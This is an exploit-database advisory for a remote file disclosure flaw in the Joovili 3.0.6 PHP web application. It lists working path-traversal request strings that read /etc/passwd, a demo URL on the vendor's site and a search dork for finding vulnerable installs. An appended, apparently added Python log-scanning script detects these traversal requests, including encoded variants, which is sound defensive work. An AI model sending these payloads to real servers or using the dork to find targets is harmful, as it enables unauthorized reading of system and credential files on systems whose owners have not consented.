Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure

Author: EcHoLL
type: webapps
platform: php
date_added: 2007-12-26  
date_updated: 2016-11-24  
verified: 1  
codes: OSVDB-40153;CVE-2007-6621;OSVDB-39666;CVE-2007-6620  

raw file: 4799.txt  
found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE


demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]
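
Detection sketch for the requests listed above, as an added example that is not part of the original advisory or of Joovili's code: it scans web-server access logs for traversal sequences in the `picture` parameter of the two scripts named in the advisory, and goes beyond the listed payloads by also catching percent-encoded and double-encoded variants. The log format (combined log format), the sample lines, the benign `uploads/42.jpg` value and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script paths as named in the advisory (2.x and 3.x layouts).
ENDPOINTS = ("include/images.inc.php", "joovili.images.php")

# Constructed sample log lines; addresses are from the documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Dec/2007:10:00:01 +0000] "GET /include/joovili.images.php?picture=uploads/42.jpg&thumbnail=FALSE HTTP/1.1" 200 5120
192.0.2.77 - - [27/Dec/2007:10:00:05 +0000] "GET /include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1432
192.0.2.77 - - [27/Dec/2007:10:00:09 +0000] "GET /include/images.inc.php?picture=%2e%2e%2f%2e%2e%2fetc%2fpasswd&thumbnail=FALSE HTTP/1.1" 200 1432
192.0.2.77 - - [27/Dec/2007:10:00:12 +0000] "GET /include/images.inc.php?picture=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432
192.0.2.11 - - [27/Dec/2007:10:00:20 +0000] "GET /gallery.php?picture=../x HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(picture):
    """True if the value escapes the image directory: '..' segment, absolute path or NUL."""
    path = fully_decode(picture).replace("\\", "/")
    segments = [s for s in path.split("/") if s]  # collapses the '//' padding
    return path.startswith("/") or ".." in segments or "\x00" in path

def find_traversal_requests(log_text):
    """Return (client, script path, HTTP status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(ENDPOINTS):
            continue
        for picture in parse_qs(url.query).get("picture", []):
            if is_traversal(picture):
                hits.append((line.split()[0], url.path, int(match.group(2))))
    return hits

if __name__ == "__main__":
    for client, path, status in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} {path} status={status}")
```

A hit with status 200 deserves priority in triage, since it indicates the script returned content for the traversal path rather than rejecting it.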